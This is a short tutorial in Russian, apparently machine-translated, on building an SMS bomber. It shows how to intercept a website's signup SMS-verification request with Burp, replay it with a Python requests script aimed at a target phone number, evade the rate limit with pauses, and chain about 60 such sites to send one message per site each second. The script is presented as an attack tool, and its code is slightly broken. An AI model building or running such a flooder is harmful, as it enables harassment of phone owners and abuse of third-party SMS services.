Это веб-сайт, целью которого является отправка текстовых сообщений.
В это время открываем артефакт burp или другие инструменты захвата пакетов (лучше всего использовать burp, т.к. модуль репитера может удовлетворить наши потребности)
В это время я подключил прокси к своему Firefox, а затем включил Burp для его перехвата.
Поймал пакет и отправил его на ретранслятор
Введите репитер для анализа пакетов данных
{"mobile":"13xxxxxx","type":"signup"}
Это данные отправлены, начинаем работу
Глядя на возвращенную посылку, можно увидеть, что она прошла успешно.
Затем мы начали писать наш Python для циклической отправки пакетов для бомбардировки цели.
import requests
import json
headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0','Cookie': 'da_a=77206194','Referer': 'http://www.demlution.com/'}
#data =
#print data
r = Requests.post('/capi/v1/dmhome/send_token',data=json.dumps({"mobile":"Номер мобильного телефона","type":"signup"}),headers=headers)
print(r.text)
Сначала протестируйте. После завершения теста вы можете использовать цикл for, чтобы повысить эффективность скрипта. После моего исследования я обнаружил, что если число будет отправлено несколько раз, оно будет заблокировано. Например, после того, как я отправил 10. пакеты одновременно (то есть после отправки десяти текстовых сообщений). Этот номер не будет отправлен снова. Даже если статус возвращенного пакета успешен, текстовое сообщение не может быть отправлено. Фактически, мы можем сделать паузу на десять секунд перед отправкой следующего. один, чтобы нас не забанили. Это тоже известно из теста.
Хорошо, позвольте мне поговорить об этом сегодня. Возможно, вы скажете, что ничего страшного, если я просто добавлю номер в черный список. Это правда, но мы можем изучить этот тип веб-сайта, а затем отправлять его по одному интерфейсу за раз. 60 интерфейсов, одна секунда. Можно отправить только 60 текстовых сообщений. Мощность по-прежнему хорошая. Фотографии успеха прилагаются.